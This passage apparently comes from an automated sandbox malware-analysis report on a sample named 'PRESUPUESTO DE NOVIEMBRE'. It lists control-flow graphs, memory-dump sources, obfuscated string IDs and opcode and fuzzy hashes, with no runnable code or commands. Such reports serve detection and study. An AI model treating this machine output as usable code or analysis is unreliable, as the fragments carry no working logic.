30074c2-30074c4 202->205 215 30072e4-300730b 203->215 216 30072bb-30072d4 203->216 204->183 212 30074e6-30074e9 204->212 209 30074d3-30074d9 205->209 210 30074c6-30074cb 205->210 209->152 214 30074db-30074e0 209->214 210->209 212->188 214->204 217 30074b6-30074b9 214->217 215->183 227 3007311-3007314 215->227 216->221 225 30072da-30072df 216->225 217->183 217->202 228 30073a5-30073ad 221->228 229 300739a-300739e 221->229 222->221 225->221 227->183 230 300731a-3007343 227->230 228->183 233 30073b3-30073b8 228->233 231 30073a0-30073a3 229->231 232 30073bd-30073c1 229->232 230->221 245 3007345-300734a 230->245 231->228 231->232 234 30073e0-30073e4 232->234 235 30073c3-30073c9 232->235 233->173 238 30073e6-30073ec 234->238 239 30073ee-300740a 234->239 235->234 237 30073cb-30073d3 235->237 237->183 240 30073d9-30073de 237->240 238->239 242 3007413-3007417 238->242 246 300740d call 3007700 239->246 247 300740d call 30076f1 239->247 240->173 242->173 243 3007419-3007435 242->243 243->173 245->221 246->242 247->242
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (o_q$(o_q$(o_q$,cq$,cq
                                                                                              • API String ID: 0-1313158517
                                                                                              • Opcode ID: ebb1e55cdd26a74cbc2d0bea7d7fdfae116dd42889def6d1d40199165fe01e06
                                                                                              • Instruction ID: 4d16a0ca2a8b190e51c749e7e2e4ff6acfbfaed97804957cbf68a8eff9acbab3
                                                                                              • Opcode Fuzzy Hash: ebb1e55cdd26a74cbc2d0bea7d7fdfae116dd42889def6d1d40199165fe01e06
                                                                                              • Instruction Fuzzy Hash: C5E14E30A02119DFEB54CFA9C884AADBBF6BF88701F598465E845AB3A1D734FD41CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (o_q$4'_q$4'_q$4'_q
                                                                                              • API String ID: 0-2845777604
                                                                                              • Opcode ID: 80b601abd0aaf719bfbabe838b2dee96305e0c99325bcad8304a25abb8291bd8
                                                                                              • Instruction ID: 720169815f1c4e22386731a8bf69f5cfe27b15d7b1d18d4977bacca42f0cf318
                                                                                              • Opcode Fuzzy Hash: 80b601abd0aaf719bfbabe838b2dee96305e0c99325bcad8304a25abb8291bd8
                                                                                              • Instruction Fuzzy Hash: BFA27F74B012099FDB15CF68C984AAEBBF6FF88310F1985A9E405DB3A1D735E981CB50

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 581 30029ec-30029f6 583 3002981-3002999 581->583 584 30029f8-3002a3b 581->584 588 30029a0-30029c8 583->588 589 3002a5d-3002aac 584->589 590 3002a3d-3002a5c 584->590 595 3002ac7-3002acf 589->595 596 3002aae-3002ab5 589->596 599 3002ad2-3002ae6 595->599 597 3002ab7-3002abc 596->597 598 3002abe-3002ac5 596->598 597->599 598->599 602 3002ae8-3002aef 599->602 603 3002afc-3002b04 599->603 604 3002af1-3002af3 602->604 605 3002af5-3002afa 602->605 606 3002b06-3002b0a 603->606 604->606 605->606 608 3002b6a-3002b6d 606->608 609 3002b0c-3002b21 606->609 610 3002bb5-3002bbb 608->610 611 3002b6f-3002b84 608->611 609->608 615 3002b23-3002b26 609->615 613 3002bc1-3002bc3 610->613 614 30036b6 610->614 611->610 618 3002b86-3002b8a 611->618 613->614 616 3002bc9-3002bce 613->616 621 30036bb-3003700 614->621 619 3002b45-3002b63 call 30002c8 615->619 620 3002b28-3002b2a 615->620 622 3003664-3003668 616->622 623 3002bd4 616->623 624 3002b92-3002bb0 call 30002c8 618->624 625 3002b8c-3002b90 618->625 619->608 620->619 626 3002b2c-3002b2f 620->626 641 3003702-3003728 621->641 642 300372e-3003874 621->642 628 300366a-300366d 622->628 629 300366f-30036b5 622->629 623->622 624->610 625->610 625->624 626->608 631 3002b31-3002b43 626->631 628->621 628->629 631->608 631->619 641->642 643 30038a6-30038a9 642->643 644 3003876-3003878 642->644 645 30038aa-30038bc 643->645 644->645 646 300387a-30038a3 644->646 649 30038ee-30038f4 645->649 650 30038be-30038eb 645->650 646->643 652 30038f6-3003908 649->652 653 3003928-3003937 649->653 650->649 655 300393a-300393d 652->655 656 300390a-300390c 652->656 653->655 657 300393e-3003941 655->657 656->657 658 300390e-3003910 656->658 659 3003942-30039e8 657->659 658->659 660 3003912-3003927 658->660 660->653
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Xcq$Xcq$Xcq$Xcq
                                                                                              • API String ID: 0-2577476577
                                                                                              • Opcode ID: e39092584de3ba9971e63d176725761b188e97184d4e9a92edbd9f2d38559915
                                                                                              • Instruction ID: f8d4c527433b5314d57e61029f1ef10eccc4cf530ed098acf3dc10aaf44ebcd4
                                                                                              • Opcode Fuzzy Hash: e39092584de3ba9971e63d176725761b188e97184d4e9a92edbd9f2d38559915
                                                                                              • Instruction Fuzzy Hash: F8028E3190E7E48FCB238B788CA039ABFF5AF4B204F0948D6C495DB29BD6285525C753

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1350 300c738-300c768 1352 300c76a 1350->1352 1353 300c76f-300c84c call 30041a0 call 3003cc0 1350->1353 1352->1353 1363 300c853-300c874 call 3005658 1353->1363 1364 300c84e 1353->1364 1366 300c879-300c884 1363->1366 1364->1363 1367 300c886 1366->1367 1368 300c88b-300c88f 1366->1368 1367->1368 1369 300c891-300c892 1368->1369 1370 300c894-300c89b 1368->1370 1373 300c8b3-300c8f7 1369->1373 1371 300c8a2-300c8b0 1370->1371 1372 300c89d 1370->1372 1371->1373 1372->1371 1377 300c95d-300c974 1373->1377 1379 300c976-300c99b 1377->1379 1380 300c8f9-300c90f 1377->1380 1389 300c9b3 1379->1389 1390 300c99d-300c9b2 1379->1390 1383 300c911-300c91d 1380->1383 1384 300c939 1380->1384 1386 300c927-300c92d 1383->1386 1387 300c91f-300c925 1383->1387 1388 300c93f-300c95c 1384->1388 1391 300c937 1386->1391 1387->1391 1388->1377 1394 300c9b4 1389->1394 1390->1389 1391->1388 1394->1394
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q$d
                                                                                              • API String ID: 0-1909484465
                                                                                              • Opcode ID: 150aa4e256766d7e51ba216dc2ef13ead076e9c6d90e72c993c00d4fee8e6570
                                                                                              • Instruction ID: a7d9d3adf32e658ef4749adc1910a6ec6da0ae5c6f3b1a0e3a05930b7cba7082
                                                                                              • Opcode Fuzzy Hash: 150aa4e256766d7e51ba216dc2ef13ead076e9c6d90e72c993c00d4fee8e6570
                                                                                              • Instruction Fuzzy Hash: A361D474E016089FEB18DFAAD984A9DFBF2BF89300F14C169E818AB365DB345945CF50

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1832 30069b0-30069e6 1833 3006fb1-300700c call 3007118 1832->1833 1834 30069ec-30069fa 1832->1834 1843 300705c-3007060 1833->1843 1844 300700e-3007012 1833->1844 1837 3006a28-3006a39 1834->1837 1838 30069fc-3006a0d 1834->1838 1840 3006aaa-3006abe 1837->1840 1841 3006a3b-3006a3f 1837->1841 1838->1837 1847 3006a0f-3006a1b 1838->1847 1974 3006ac1 call 30069a0 1840->1974 1975 3006ac1 call 30069b0 1840->1975 1845 3006a41-3006a4d 1841->1845 1846 3006a5a-3006a63 1841->1846 1853 3007062-3007071 1843->1853 1854 3007077-300708b 1843->1854 1850 3007021-3007028 1844->1850 1851 3007014-3007019 1844->1851 1855 3006a53-3006a55 1845->1855 1856 3006ddb-3006e26 1845->1856 1848 3006a69-3006a6c 1846->1848 1849 3006d6c 1846->1849 1858 3006d71-3006dd4 1847->1858 1859 3006a21-3006a23 1847->1859 1848->1849 1860 3006a72-3006a91 1848->1860 1849->1858 1861 30070fe-3007113 1850->1861 1862 300702e-3007035 1850->1862 1851->1850 1852 3006ac7-3006acd 1863 3006ad6-3006add 1852->1863 1864 3006acf-3006ad1 1852->1864 1865 3007073-3007075 1853->1865 1866 300709d-30070a7 1853->1866 1977 300708d call 3009dd0 1854->1977 1978 300708d call 3009de0 1854->1978 1979 300708d call 300a0e8 1854->1979 1857 3006d62-3006d69 1855->1857 1928 3006e2d-3006eac 1856->1928 1858->1856 1859->1857 1860->1849 1891 3006a97-3006a9d 1860->1891 1862->1843 1873 3007037-300703b 1862->1873 1871 3006ae3-3006afa 1863->1871 1872 3006bcb-3006bdc 1863->1872 1864->1857 1867 3007093-300709a 1865->1867 1868 30070b1-30070b5 1866->1868 1869 30070a9-30070af 1866->1869 1875 30070bd-30070f7 1868->1875 1877 30070b7 1868->1877 1869->1875 1871->1872 1885 3006b00-3006b0c 1871->1885 1889 3006c06-3006c0c 1872->1889 1890 3006bde-3006beb 1872->1890 1879 300704a-3007051 1873->1879 1880 300703d-3007042 1873->1880 1875->1861 1877->1875 1879->1861 1884 3007057-300705a 1879->1884 1880->1879 1884->1867 1895 3006b12-3006b7e 1885->1895 1896 3006bc4-3006bc6 1885->1896 1893 3006c27-3006c2d 1889->1893 1894 3006c0e-3006c1a 1889->1894 1890->1893 1906 3006bed-3006bf9 1890->1906 1891->1833 1900 3006aa3-3006aa7 1891->1900 1897 3006c33-3006c50 1893->1897 1898 3006d5f 1893->1898 1903 3006c20-3006c22 1894->1903 1904 3006ec3-3006f26 1894->1904 1931 3006b80-3006baa 1895->1931 1932 3006bac-3006bc1 1895->1932 1896->1857 1897->1849 1922 3006c56-3006c59 1897->1922 1898->1857 1900->1840 1903->1857 1955 3006f2d-3006fac 1904->1955 1912 3006eb1-3006ebc 1906->1912 1913 3006bff-3006c01 1906->1913 1912->1904 1913->1857 1922->1833 1924 3006c5f-3006c85 1922->1924 1924->1898 1937 3006c8b-3006c97 1924->1937 1931->1932 1932->1896 1940 3006d5b-3006d5d 1937->1940 1941 3006c9d-3006d15 1937->1941 1940->1857 1956 3006d43-3006d58 1941->1956 1957 3006d17-3006d41 1941->1957 1956->1940 1957->1956 1974->1852 1975->1852 1977->1867 1978->1867 1979->1867
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (o_q$Hcq
                                                                                              • API String ID: 0-689770731
                                                                                              • Opcode ID: 1346bd645640001b16a7e8007c17bf6308774d7ead416b7c5968efe277d0de4a
                                                                                              • Instruction ID: 7fbb1ce0bb7f007d532d4c7e5268da40d755b6ddd0068fbbaf24a866d1f7a91f
                                                                                              • Opcode Fuzzy Hash: 1346bd645640001b16a7e8007c17bf6308774d7ead416b7c5968efe277d0de4a
                                                                                              • Instruction Fuzzy Hash: 36227C70A002199FEB54DF69C854AAEBBF6FF88300F148569E815EB3A1DF359D41CB90

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2239 300c148-300c158 2240 300c184 2239->2240 2241 300c15a-300c172 2239->2241 2242 300c186-300c18a 2240->2242 2245 300c174-300c179 2241->2245 2246 300c17b-300c17e 2241->2246 2245->2242 2247 300c180-300c182 2246->2247 2248 300c18b-300c199 2246->2248 2247->2240 2247->2241 2250 300c208-300c20a 2248->2250 2251 300c19b-300c1a1 2248->2251 2252 300c210-300c2ac call 30041a0 call 3003cc0 2250->2252 2251->2252 2253 300c1a3-300c1c8 2251->2253 2264 300c2b3-300c2d4 call 3005658 2252->2264 2265 300c2ae 2252->2265 2254 300c1ca 2253->2254 2255 300c1cf-300c205 2253->2255 2254->2255 2255->2250 2267 300c2d9-300c2e4 2264->2267 2265->2264 2268 300c2e6 2267->2268 2269 300c2eb-300c2ef 2267->2269 2268->2269 2270 300c2f1-300c2f2 2269->2270 2271 300c2f4-300c2fb 2269->2271 2272 300c313-300c357 2270->2272 2273 300c302-300c310 2271->2273 2274 300c2fd 2271->2274 2278 300c3bd-300c3d4 2272->2278 2273->2272 2274->2273 2280 300c3d6-300c3fb 2278->2280 2281 300c359-300c36f 2278->2281 2287 300c413 2280->2287 2288 300c3fd-300c412 2280->2288 2284 300c371-300c37d 2281->2284 2285 300c399 2281->2285 2289 300c387-300c38d 2284->2289 2290 300c37f-300c385 2284->2290 2291 300c39f-300c3bc 2285->2291 2288->2287 2292 300c397 2289->2292 2290->2292 2291->2278 2292->2291
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: a2e7fefcc418a3e6772f21fe8e39c0cb05aea6638ff98bd617f2e17e4e4c8f6f
                                                                                              • Instruction ID: 4451f6e68ab833460a99dfee394969dd12107ec3c62a7e76be744ed2e35bb1d7
                                                                                              • Opcode Fuzzy Hash: a2e7fefcc418a3e6772f21fe8e39c0cb05aea6638ff98bd617f2e17e4e4c8f6f
                                                                                              • Instruction Fuzzy Hash: 76A1D674E01218DFEB54DFAAD884A9DBBF2FF89300F148169E419AB365DB309881CF50

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2296 3005380-30053a0 2297 30053a2 2296->2297 2298 30053a7-3005484 call 30041a0 call 3003cc0 2296->2298 2297->2298 2308 3005486 2298->2308 2309 300548b-30054a9 2298->2309 2308->2309 2340 30054ac call 3005658 2309->2340 2341 30054ac call 3005649 2309->2341 2310 30054b2-30054bd 2311 30054c4-30054c8 2310->2311 2312 30054bf 2310->2312 2313 30054ca-30054cb 2311->2313 2314 30054cd-30054d4 2311->2314 2312->2311 2315 30054ec-3005530 2313->2315 2316 30054d6 2314->2316 2317 30054db-30054e9 2314->2317 2321 3005596-30055ad 2315->2321 2316->2317 2317->2315 2323 3005532-3005548 2321->2323 2324 30055af-30055d4 2321->2324 2328 3005572 2323->2328 2329 300554a-3005556 2323->2329 2331 30055d6-30055eb 2324->2331 2332 30055ec 2324->2332 2330 3005578-3005595 2328->2330 2333 3005560-3005566 2329->2333 2334 3005558-300555e 2329->2334 2330->2321 2331->2332 2336 30055ed 2332->2336 2335 3005570 2333->2335 2334->2335 2335->2330 2336->2336 2340->2310 2341->2310
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: f0ea144c10383ea80c3a8c2d4557e5406b50f9589ba9ff5668accfb5f778e8ec
                                                                                              • Instruction ID: d88aa0723ff416b07664b67b9a8c6cf04fdf180a526ea5b3e904f7dfc7507dcb
                                                                                              • Opcode Fuzzy Hash: f0ea144c10383ea80c3a8c2d4557e5406b50f9589ba9ff5668accfb5f778e8ec
                                                                                              • Instruction Fuzzy Hash: 8D81B274E05218DFEB54DFAAD994A9DBBF2BF89300F14C069E419AB365DB309981CF10
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: 10584115c12b077c2fd4f41980fa1681898a3c135a75dadbed44e73135d1e5eb
                                                                                              • Instruction ID: 7cf8754e0698a974cf7326e9dd7225a93ba9c2f7f6041b7de8ea34011ee5ac95
                                                                                              • Opcode Fuzzy Hash: 10584115c12b077c2fd4f41980fa1681898a3c135a75dadbed44e73135d1e5eb
                                                                                              • Instruction Fuzzy Hash: 5081A174E01218DFEB54DFAAD984A9DFBF2BF89300F148069E419AB365DB349985CF10

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2388 300c748-300c768 2389 300c76a 2388->2389 2390 300c76f-300c84c call 30041a0 call 3003cc0 2388->2390 2389->2390 2400 300c853-300c874 call 3005658 2390->2400 2401 300c84e 2390->2401 2403 300c879-300c884 2400->2403 2401->2400 2404 300c886 2403->2404 2405 300c88b-300c88f 2403->2405 2404->2405 2406 300c891-300c892 2405->2406 2407 300c894-300c89b 2405->2407 2410 300c8b3-300c8f7 2406->2410 2408 300c8a2-300c8b0 2407->2408 2409 300c89d 2407->2409 2408->2410 2409->2408 2414 300c95d-300c974 2410->2414 2416 300c976-300c99b 2414->2416 2417 300c8f9-300c90f 2414->2417 2426 300c9b3 2416->2426 2427 300c99d-300c9b2 2416->2427 2420 300c911-300c91d 2417->2420 2421 300c939 2417->2421 2423 300c927-300c92d 2420->2423 2424 300c91f-300c925 2420->2424 2425 300c93f-300c95c 2421->2425 2428 300c937 2423->2428 2424->2428 2425->2414 2431 300c9b4 2426->2431 2427->2426 2428->2425 2431->2431
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: 25298a2783a268f902b8691c344670edc038c9cbcade915f091d13e8459e222e
                                                                                              • Instruction ID: 656c1b3e330c211d293ec70deeff575bbd0fdb00b8027142db46192328db9a98
                                                                                              • Opcode Fuzzy Hash: 25298a2783a268f902b8691c344670edc038c9cbcade915f091d13e8459e222e
                                                                                              • Instruction Fuzzy Hash: B981A174E01218DFEB54DFAAD984A9DBBF2BF89300F14C169E419AB365DB309981CF50

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2342 300c478-300c498 2343 300c49a 2342->2343 2344 300c49f-300c57c call 30041a0 call 3003cc0 2342->2344 2343->2344 2355 300c583-300c5a4 call 3005658 2344->2355 2356 300c57e 2344->2356 2358 300c5a9-300c5b4 2355->2358 2356->2355 2359 300c5b6 2358->2359 2360 300c5bb-300c5bf 2358->2360 2359->2360 2361 300c5c1-300c5c2 2360->2361 2362 300c5c4-300c5cb 2360->2362 2363 300c5e3-300c627 2361->2363 2364 300c5d2-300c5e0 2362->2364 2365 300c5cd 2362->2365 2369 300c68d-300c6a4 2363->2369 2364->2363 2365->2364 2371 300c6a6-300c6cb 2369->2371 2372 300c629-300c63f 2369->2372 2378 300c6e3 2371->2378 2379 300c6cd-300c6e2 2371->2379 2376 300c641-300c64d 2372->2376 2377 300c669 2372->2377 2381 300c657-300c65d 2376->2381 2382 300c64f-300c655 2376->2382 2380 300c66f-300c68c 2377->2380 2386 300c6e4 2378->2386 2379->2378 2380->2369 2383 300c667 2381->2383 2382->2383 2383->2380 2386->2386
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: de2a6211d94b8df03f4c7ade24d0d4b555542a92d7d70efa2ad2df226d25eb02
                                                                                              • Instruction ID: 353283b5b2976dbc877c826db10070a4ec135ac75f0c6183774a4c1f99f6d041
                                                                                              • Opcode Fuzzy Hash: de2a6211d94b8df03f4c7ade24d0d4b555542a92d7d70efa2ad2df226d25eb02
                                                                                              • Instruction Fuzzy Hash: DB81B374E01218DFEB54DFAAD984A9DBBF2BF88300F14D169E419AB365DB305981CF50

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2433 300ca18-300ca38 2434 300ca3a 2433->2434 2435 300ca3f-300cb1c call 30041a0 call 3003cc0 2433->2435 2434->2435 2445 300cb23-300cb44 call 3005658 2435->2445 2446 300cb1e 2435->2446 2448 300cb49-300cb54 2445->2448 2446->2445 2449 300cb56 2448->2449 2450 300cb5b-300cb5f 2448->2450 2449->2450 2451 300cb61-300cb62 2450->2451 2452 300cb64-300cb6b 2450->2452 2453 300cb83-300cbc7 2451->2453 2454 300cb72-300cb80 2452->2454 2455 300cb6d 2452->2455 2459 300cc2d-300cc44 2453->2459 2454->2453 2455->2454 2461 300cc46-300cc6b 2459->2461 2462 300cbc9-300cbdf 2459->2462 2470 300cc83 2461->2470 2471 300cc6d-300cc82 2461->2471 2465 300cbe1-300cbed 2462->2465 2466 300cc09 2462->2466 2468 300cbf7-300cbfd 2465->2468 2469 300cbef-300cbf5 2465->2469 2472 300cc0f-300cc2c 2466->2472 2473 300cc07 2468->2473 2469->2473 2475 300cc84 2470->2475 2471->2470 2472->2459 2473->2472 2475->2475
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: 1691f865d6fd2864ac47f58442f8df2c67471816cb94c9f611e9ad99248129e0
                                                                                              • Instruction ID: ca8150960e511479c5ca4e5f906acc56366c65cbafbac0602e2bd062690ccbb8
                                                                                              • Opcode Fuzzy Hash: 1691f865d6fd2864ac47f58442f8df2c67471816cb94c9f611e9ad99248129e0
                                                                                              • Instruction Fuzzy Hash: CC81C174E01218CFEB54DFAAD984A9DBBF2BF88300F14C169E419AB365DB305981CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: 733fb89b9b8bdd505406bf022d0011866012bc1e056e878b103e3597d952dff1
                                                                                              • Instruction ID: f82f86a577c45d3d59f08129c66d85d70df33772509287f5892c2be52a6cd21f
                                                                                              • Opcode Fuzzy Hash: 733fb89b9b8bdd505406bf022d0011866012bc1e056e878b103e3597d952dff1
                                                                                              • Instruction Fuzzy Hash: DC81A274E01218DFEB54DFAAD984A9DBBF2BF88300F14C069E419AB365DB349981CF50

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2478 300cce8-300cd08 2479 300cd0a 2478->2479 2480 300cd0f-300cdec call 30041a0 call 3003cc0 2478->2480 2479->2480 2490 300cdf3-300ce14 call 3005658 2480->2490 2491 300cdee 2480->2491 2493 300ce19-300ce24 2490->2493 2491->2490 2494 300ce26 2493->2494 2495 300ce2b-300ce2f 2493->2495 2494->2495 2496 300ce31-300ce32 2495->2496 2497 300ce34-300ce3b 2495->2497 2498 300ce53-300ce97 2496->2498 2499 300ce42-300ce50 2497->2499 2500 300ce3d 2497->2500 2504 300cefd-300cf14 2498->2504 2499->2498 2500->2499 2506 300cf16-300cf3b 2504->2506 2507 300ce99-300ceaf 2504->2507 2516 300cf53 2506->2516 2517 300cf3d-300cf52 2506->2517 2511 300ceb1-300cebd 2507->2511 2512 300ced9 2507->2512 2513 300cec7-300cecd 2511->2513 2514 300cebf-300cec5 2511->2514 2515 300cedf-300cefc 2512->2515 2518 300ced7 2513->2518 2514->2518 2515->2504 2519 300cf54 2516->2519 2517->2516 2518->2515 2519->2519
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: 2f244c7a07642040099805d190f6af2a25f9c9cee6ac8a02f48ba7f862fba87b
                                                                                              • Instruction ID: 4450ea340385f019df43de4d3285e9e7234fe5be3ee2488876ea34764a6e7659
                                                                                              • Opcode Fuzzy Hash: 2f244c7a07642040099805d190f6af2a25f9c9cee6ac8a02f48ba7f862fba87b
                                                                                              • Instruction Fuzzy Hash: F881B274E01258DFEB54DFAAD984A9DBBF2BF88300F14C169E419AB365DB305981CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: 89c7e9b6af36792b0d724969f9ce594c8689378decb5a28497623484a4733f43
                                                                                              • Instruction ID: b00a21914a84a433e16f45db46c2f5935a7f0de3b3d916bd5118d3dbf5af91f5
                                                                                              • Opcode Fuzzy Hash: 89c7e9b6af36792b0d724969f9ce594c8689378decb5a28497623484a4733f43
                                                                                              • Instruction Fuzzy Hash: E961D374E016089FEB18DFAAC984A9DFBF2BF88300F14D16AD418AB365DB345945CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: 036d9dbdaaa0fe906d9275dd9153b6f6601b2804d2a8408ccdd523d80bd962f5
                                                                                              • Instruction ID: 746da6112c6806507b43611285de2c4b4aa52134b20b3d081ba87550beff07f4
                                                                                              • Opcode Fuzzy Hash: 036d9dbdaaa0fe906d9275dd9153b6f6601b2804d2a8408ccdd523d80bd962f5
                                                                                              • Instruction Fuzzy Hash: 4B61C474E056089FEB58CFAAD994A9DFBF2BF89300F14C069D418AB365DB349945CF10
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: 3b4f772ff918ac98d3fb7278d26824d5f97b8ab527a6d92bc67f8184522230c9
                                                                                              • Instruction ID: 7af6ffe225c46c4dee0efa459e872a7cd219b7ca7ccb503e7e48f410452f5e34
